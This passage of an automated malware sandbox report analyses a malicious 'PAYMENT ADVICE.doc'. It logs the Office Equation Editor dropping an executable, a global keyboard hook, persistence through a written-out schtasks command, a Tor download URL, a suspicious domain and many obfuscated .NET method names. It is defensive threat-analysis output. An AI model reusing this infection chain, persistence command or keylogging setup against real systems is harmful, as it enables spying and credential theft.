                Source: merciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
                Source: merciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
                Source: merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
                Source: merciesxdncdc.exe, 00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmp, merciesxdncdc.exe, 00000007.00000002.2347870070.000000000292B000.00000004.00000001.sdmp, merciesxdncdc.exe, 00000007.00000002.2347810118.0000000002902000.00000004.00000001.sdmpString found in binary or memory: https://N9CITA5Q9HG.org
                Source: merciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                Source: merciesxdncdc.exe, 00000007.00000002.2351633148.0000000006293000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
                Source: merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                Source: merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
                Source: merciesxdncdc.exe, 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                Source: merciesxdncdc.exe, 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

                barindex
                Contains functionality to register a low level keyboard hookShow sources
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_0047865C SetWindowsHookExW 0000000D,00000000,?,?
                Installs a global keyboard hookShow sources
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWindow created: window name: CLIPBRDWNDCLASS

                System Summary:

                barindex
                Office equation editor drops PE fileShow sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\merciesxdncdc.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_00265338
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_00266350
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_00265680
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_0026EF20
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_002620AB
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_00470B70
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_00479D10
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_0047D119
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_00476580
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_004773A8
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_0047D6F8
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_0047EF49
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_004779C8
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_00482AD0
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeCode function: 7_2_00480683
                Source: okilo[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: merciesxdncdc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: JxCmQoa.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: okilo[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: merciesxdncdc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: JxCmQoa.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: okilo[1].exe.2.dr, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.csCryptographic APIs: 'CreateDecryptor'
                Source: merciesxdncdc.exe.2.dr, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.csCryptographic APIs: 'CreateDecryptor'
                Source: JxCmQoa.exe.4.dr, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.csCryptographic APIs: 'CreateDecryptor'
                Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.csCryptographic APIs: 'CreateDecryptor'
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@8/16@11/2
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$YMENT ADVICE.docJump to behavior
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeMutant created: \Sessions\1\BaseNamedObjects\fKdScoFaGrq
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC5ED.tmpJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................H.......(.P.............\.......d...............................................................................
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: PAYMENT ADVICE.docReversingLabs: Detection: 26%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\merciesxdncdc.exe C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JxCmQoa' /XML 'C:\Users\user\AppData\Local\Temp\tmp2E52.tmp'
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess created: C:\Users\user\AppData\Roaming\merciesxdncdc.exe C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\merciesxdncdc.exe C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JxCmQoa' /XML 'C:\Users\user\AppData\Local\Temp\tmp2E52.tmp'
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess created: C:\Users\user\AppData\Roaming\merciesxdncdc.exe C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: initial sampleStatic PE information: section name: .text entropy: 7.56992954159
                Source: initial sampleStatic PE information: section name: .text entropy: 7.56992954159
                Source: initial sampleStatic PE information: section name: .text entropy: 7.56992954159
                Source: okilo[1].exe.2.dr, TYrkToaGEMpjujrFga/prFipO63mgI0yvrVyq.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'T4ltQqiAVA', 'y5ALwKxnOC', 'SPFLlBsnwk', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'YDGLJl8xAQ'
                Source: okilo[1].exe.2.dr, SxfIUXVJdgBjNDLFNB/AM2hB8Lor7USiIUZxs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'vYjtFVkHe8', 'hSbFCsIf9U', 'VBYFGHvDmK', 'H6tFAkBj2Z', 'd1kFDWfdZN', 'L3LFTMp8Vp', 'QvMFQUJcSm', 'Xg0FwSp5eu'
                Source: okilo[1].exe.2.dr, ngYh84jGCP5wkphDFk5/yEIfrdj7Dt1Iw9K447j.csHigh entropy of concatenated method names: '.ctor', 'q9OaGjku7c', 'TJ7aAv00Et', 'f0jaDqJSk2', 'qBHaTNRD8W', 'xkNaQK4wah', 'rNpaw40VDI', 'CLMal09RDm', 'VSDaJ3xt4v', 'nGdazASDKU'
                Source: okilo[1].exe.2.dr, okG58OBUEjZS4DZJG8/c2esVpS6KesUCjCATw.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'bbJZhccJiR', 'WlYYiQ9SWm', 'N60YcfEWYd', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'fbB55WM1tB'
                Source: okilo[1].exe.2.dr, Q7gT9wnkWoJQtDsXhx/z2cKe65WbGPGIjxmwr.csHigh entropy of concatenated method names: 'GeLovehHWr', 'Fknosk0xkT', 'UkPo0qs5Tx', 'gW5oEr6ndm', 'Fnco8evmdm', 'KcsofG2qCq', 'bNZormYp4J', 'JyIoi8qVIn', 'V46omQE60N', 'IRnoIISvIs'
                Source: okilo[1].exe.2.dr, LNBaGnEQA3vyBDvVVi/em9cs2DYHr6JrqXilP.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'r1dZFhqXD1', 'YUHZLREAL5', 'HqoZ5K4kGc', 'TeeZY8InhQ', 'QrFZrlH2LO', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl'
                Source: okilo[1].exe.2.dr, YIrq8QHhDSfadQYNKS/xKDYPZQDg30Ao09YpT.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'y7xNDvof1h', 'Q435Ja1njk', 'UkP5zqs5Tx', 'gW5Ybr6ndm', 'ET3Y4eM0Ov', 'FncYoevmdm', 'KcsYUG2qCq', 'JyIYt8qVIn'
                Source: okilo[1].exe.2.dr, Fa8VLXM23mORvR5dME/HCKUkDbh5y3OV2oc6A.csHigh entropy of concatenated method names: 'kfG46Gu61d', 'PTk4SqjEAg', 'fbB4eWM1tB', 'bqs422jkMh', 'HQR47fZ3vS', 'vXF494PUY4', 'kEZ4qjgk85', 'gvM41Y4HNO', 'GQJ4uSgJ1n', 'PjQ4K0TZCQ'
                Source: okilo[1].exe.2.dr, bu1iYZjjaajwEIC7Iup/w9PdenjqgpAPWgp9wL5.csHigh entropy of concatenated method names: 'Dispose', 'QskaBtjAuY', 'AFqaPB2YbE', 'tVtaXuZSEy', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'rUR0VgYEXKD42V8HKGP', 'Fp8bSFYlanUNiKPqvWL'
                Source: okilo[1].exe.2.dr, XcixWBkBVqsjcaY6KL/OFsmGHhgogBJuaQceU.csHigh entropy of concatenated method names: 'TBvUjS7lP8', 'Q4fUuNHHUD', 'KAFUylqVop', 'ChfU3RNQmq', 'xVFUPj7qNN', 'AGQUXMqKhN', 'jioUdE9HJL', 'J73URxXTnn', 'eJSUCUn5uo', 'd0UUGXJlsJ'
                Source: okilo[1].exe.2.dr, edM23O9tYBo3W9lyds/OgdU2MJmnLuJrUAowu.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'atTFyjqlwC', 'lriF3OBRwt', 'BreFBgaf10', 'KJ4FPKPpmT', 'zEfFXihnuJ', 'gcXFdvP77o', 'nAUFRaNNpm', 'JnrFHwJRTO'
                Source: okilo[1].exe.2.dr, IHXFP9YcujtIe1fkv0/kTeD6mxEv4W0qYVQoh.csHigh entropy of concatenated method names: 'Q6RUMV6LIj', 'Oc1UOxefwD', 'ornUWFtLC6', 'hytUx6xd1I', 'L4NUv9v5d9', 'WP5UsWAMyC', 'ACsUplcTLj', 'xbdU0uPUah', 'rHFUE0Twv4', 'pAnUVksqey'
                Source: okilo[1].exe.2.dr, xn2PL6Ay0FbgjDCQUf/UyLOepCdZDDnGoRbQD.csHigh entropy of concatenated method names: '.ctor', 'opga4Q0sxF', 'BItaorKZTM', 'pLAaUnwosb', 'uAhatLyxpT', 'RARaNRD0l6', 'K9oaZAurMg', 'XCK7Hf3gDDwBligG6BE', 'QhJb123S9cGrcrHo9qN', 'Mv0W6M3PIhkEeZ5xXmb'
                Source: okilo[1].exe.2.dr, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.csHigh entropy of concatenated method names: 'wTZaS0nBvA', 'TCNa7mT90D', 'C7sa9Heyhs', '.ctor', '.ctor', 'HvMakdf0Mv', 'RUJaehb7wV', 'hdta2bsLZX', 'UyyahGtghd', 'V2TQuv3O2GTfCCOhUOo'
                Source: okilo[1].exe.2.dr, dFh6INFVpRyg1i1XS0/qAIrjXyqoofwXavk63.csHigh entropy of concatenated method names: '.ctor', 'RwOarlePvA', 'L1NamsEp4Q', 'tctaM9GGtw', 'bAXaOxs1nZ', 'D0FanqTD6a', 'TMXaWlJFKf', 'jgxaxDfADP', 'aqUagHR5bo', 'qa1avyK3VB'
                Source: merciesxdncdc.exe.2.dr, TYrkToaGEMpjujrFga/prFipO63mgI0yvrVyq.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'T4ltQqiAVA', 'y5ALwKxnOC', 'SPFLlBsnwk', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'YDGLJl8xAQ'
                Source: merciesxdncdc.exe.2.dr, ngYh84jGCP5wkphDFk5/yEIfrdj7Dt1Iw9K447j.csHigh entropy of concatenated method names: '.ctor', 'q9OaGjku7c', 'TJ7aAv00Et', 'f0jaDqJSk2', 'qBHaTNRD8W', 'xkNaQK4wah', 'rNpaw40VDI', 'CLMal09RDm', 'VSDaJ3xt4v', 'nGdazASDKU'
                Source: merciesxdncdc.exe.2.dr, SxfIUXVJdgBjNDLFNB/AM2hB8Lor7USiIUZxs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'vYjtFVkHe8', 'hSbFCsIf9U', 'VBYFGHvDmK', 'H6tFAkBj2Z', 'd1kFDWfdZN', 'L3LFTMp8Vp', 'QvMFQUJcSm', 'Xg0FwSp5eu'
                Source: merciesxdncdc.exe.2.dr, LNBaGnEQA3vyBDvVVi/em9cs2DYHr6JrqXilP.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'r1dZFhqXD1', 'YUHZLREAL5', 'HqoZ5K4kGc', 'TeeZY8InhQ', 'QrFZrlH2LO', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl'
                Source: merciesxdncdc.exe.2.dr, okG58OBUEjZS4DZJG8/c2esVpS6KesUCjCATw.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'bbJZhccJiR', 'WlYYiQ9SWm', 'N60YcfEWYd', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'fbB55WM1tB'
                Source: merciesxdncdc.exe.2.dr, Q7gT9wnkWoJQtDsXhx/z2cKe65WbGPGIjxmwr.csHigh entropy of concatenated method names: 'GeLovehHWr', 'Fknosk0xkT', 'UkPo0qs5Tx', 'gW5oEr6ndm', 'Fnco8evmdm', 'KcsofG2qCq', 'bNZormYp4J', 'JyIoi8qVIn', 'V46omQE60N', 'IRnoIISvIs'
                Source: merciesxdncdc.exe.2.dr, YIrq8QHhDSfadQYNKS/xKDYPZQDg30Ao09YpT.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'y7xNDvof1h', 'Q435Ja1njk', 'UkP5zqs5Tx', 'gW5Ybr6ndm', 'ET3Y4eM0Ov', 'FncYoevmdm', 'KcsYUG2qCq', 'JyIYt8qVIn'
                Source: merciesxdncdc.exe.2.dr, Fa8VLXM23mORvR5dME/HCKUkDbh5y3OV2oc6A.csHigh entropy of concatenated method names: 'kfG46Gu61d', 'PTk4SqjEAg', 'fbB4eWM1tB', 'bqs422jkMh', 'HQR47fZ3vS', 'vXF494PUY4', 'kEZ4qjgk85', 'gvM41Y4HNO', 'GQJ4uSgJ1n', 'PjQ4K0TZCQ'
                Source: merciesxdncdc.exe.2.dr, bu1iYZjjaajwEIC7Iup/w9PdenjqgpAPWgp9wL5.csHigh entropy of concatenated method names: 'Dispose', 'QskaBtjAuY', 'AFqaPB2YbE', 'tVtaXuZSEy', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'rUR0VgYEXKD42V8HKGP', 'Fp8bSFYlanUNiKPqvWL'
                Source: merciesxdncdc.exe.2.dr, XcixWBkBVqsjcaY6KL/OFsmGHhgogBJuaQceU.csHigh entropy of concatenated method names: 'TBvUjS7lP8', 'Q4fUuNHHUD', 'KAFUylqVop', 'ChfU3RNQmq', 'xVFUPj7qNN', 'AGQUXMqKhN', 'jioUdE9HJL', 'J73URxXTnn', 'eJSUCUn5uo', 'd0UUGXJlsJ'
                Source: merciesxdncdc.exe.2.dr, IHXFP9YcujtIe1fkv0/kTeD6mxEv4W0qYVQoh.csHigh entropy of concatenated method names: 'Q6RUMV6LIj', 'Oc1UOxefwD', 'ornUWFtLC6', 'hytUx6xd1I', 'L4NUv9v5d9', 'WP5UsWAMyC', 'ACsUplcTLj', 'xbdU0uPUah', 'rHFUE0Twv4', 'pAnUVksqey'
                Source: merciesxdncdc.exe.2.dr, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.csHigh entropy of concatenated method names: 'wTZaS0nBvA', 'TCNa7mT90D', 'C7sa9Heyhs', '.ctor', '.ctor', 'HvMakdf0Mv', 'RUJaehb7wV', 'hdta2bsLZX', 'UyyahGtghd', 'V2TQuv3O2GTfCCOhUOo'
                Source: merciesxdncdc.exe.2.dr, edM23O9tYBo3W9lyds/OgdU2MJmnLuJrUAowu.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'atTFyjqlwC', 'lriF3OBRwt', 'BreFBgaf10', 'KJ4FPKPpmT', 'zEfFXihnuJ', 'gcXFdvP77o', 'nAUFRaNNpm', 'JnrFHwJRTO'
                Source: merciesxdncdc.exe.2.dr, xn2PL6Ay0FbgjDCQUf/UyLOepCdZDDnGoRbQD.csHigh entropy of concatenated method names: '.ctor', 'opga4Q0sxF', 'BItaorKZTM', 'pLAaUnwosb', 'uAhatLyxpT', 'RARaNRD0l6', 'K9oaZAurMg', 'XCK7Hf3gDDwBligG6BE', 'QhJb123S9cGrcrHo9qN', 'Mv0W6M3PIhkEeZ5xXmb'
                Source: merciesxdncdc.exe.2.dr, dFh6INFVpRyg1i1XS0/qAIrjXyqoofwXavk63.csHigh entropy of concatenated method names: '.ctor', 'RwOarlePvA', 'L1NamsEp4Q', 'tctaM9GGtw', 'bAXaOxs1nZ', 'D0FanqTD6a', 'TMXaWlJFKf', 'jgxaxDfADP', 'aqUagHR5bo', 'qa1avyK3VB'
                Source: JxCmQoa.exe.4.dr, TYrkToaGEMpjujrFga/prFipO63mgI0yvrVyq.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'T4ltQqiAVA', 'y5ALwKxnOC', 'SPFLlBsnwk', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'YDGLJl8xAQ'
                Source: JxCmQoa.exe.4.dr, SxfIUXVJdgBjNDLFNB/AM2hB8Lor7USiIUZxs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'vYjtFVkHe8', 'hSbFCsIf9U', 'VBYFGHvDmK', 'H6tFAkBj2Z', 'd1kFDWfdZN', 'L3LFTMp8Vp', 'QvMFQUJcSm', 'Xg0FwSp5eu'
                Source: JxCmQoa.exe.4.dr, Q7gT9wnkWoJQtDsXhx/z2cKe65WbGPGIjxmwr.csHigh entropy of concatenated method names: 'GeLovehHWr', 'Fknosk0xkT', 'UkPo0qs5Tx', 'gW5oEr6ndm', 'Fnco8evmdm', 'KcsofG2qCq', 'bNZormYp4J', 'JyIoi8qVIn', 'V46omQE60N', 'IRnoIISvIs'
                Source: JxCmQoa.exe.4.dr, LNBaGnEQA3vyBDvVVi/em9cs2DYHr6JrqXilP.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'r1dZFhqXD1', 'YUHZLREAL5', 'HqoZ5K4kGc', 'TeeZY8InhQ', 'QrFZrlH2LO', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl'
                Source: JxCmQoa.exe.4.dr, YIrq8QHhDSfadQYNKS/xKDYPZQDg30Ao09YpT.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'y7xNDvof1h', 'Q435Ja1njk', 'UkP5zqs5Tx', 'gW5Ybr6ndm', 'ET3Y4eM0Ov', 'FncYoevmdm', 'KcsYUG2qCq', 'JyIYt8qVIn'
                Source: JxCmQoa.exe.4.dr, edM23O9tYBo3W9lyds/OgdU2MJmnLuJrUAowu.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'atTFyjqlwC', 'lriF3OBRwt', 'BreFBgaf10', 'KJ4FPKPpmT', 'zEfFXihnuJ', 'gcXFdvP77o', 'nAUFRaNNpm', 'JnrFHwJRTO'
                Source: JxCmQoa.exe.4.dr, Fa8VLXM23mORvR5dME/HCKUkDbh5y3OV2oc6A.csHigh entropy of concatenated method names: 'kfG46Gu61d', 'PTk4SqjEAg', 'fbB4eWM1tB', 'bqs422jkMh', 'HQR47fZ3vS', 'vXF494PUY4', 'kEZ4qjgk85', 'gvM41Y4HNO', 'GQJ4uSgJ1n', 'PjQ4K0TZCQ'
                Source: JxCmQoa.exe.4.dr, XcixWBkBVqsjcaY6KL/OFsmGHhgogBJuaQceU.csHigh entropy of concatenated method names: 'TBvUjS7lP8', 'Q4fUuNHHUD', 'KAFUylqVop', 'ChfU3RNQmq', 'xVFUPj7qNN', 'AGQUXMqKhN', 'jioUdE9HJL', 'J73URxXTnn', 'eJSUCUn5uo', 'd0UUGXJlsJ'
                Source: JxCmQoa.exe.4.dr, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.csHigh entropy of concatenated method names: 'wTZaS0nBvA', 'TCNa7mT90D', 'C7sa9Heyhs', '.ctor', '.ctor', 'HvMakdf0Mv', 'RUJaehb7wV', 'hdta2bsLZX', 'UyyahGtghd', 'V2TQuv3O2GTfCCOhUOo'
                Source: JxCmQoa.exe.4.dr, xn2PL6Ay0FbgjDCQUf/UyLOepCdZDDnGoRbQD.csHigh entropy of concatenated method names: '.ctor', 'opga4Q0sxF', 'BItaorKZTM', 'pLAaUnwosb', 'uAhatLyxpT', 'RARaNRD0l6', 'K9oaZAurMg', 'XCK7Hf3gDDwBligG6BE', 'QhJb123S9cGrcrHo9qN', 'Mv0W6M3PIhkEeZ5xXmb'
                Source: JxCmQoa.exe.4.dr, bu1iYZjjaajwEIC7Iup/w9PdenjqgpAPWgp9wL5.csHigh entropy of concatenated method names: 'Dispose', 'QskaBtjAuY', 'AFqaPB2YbE', 'tVtaXuZSEy', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'rUR0VgYEXKD42V8HKGP', 'Fp8bSFYlanUNiKPqvWL'
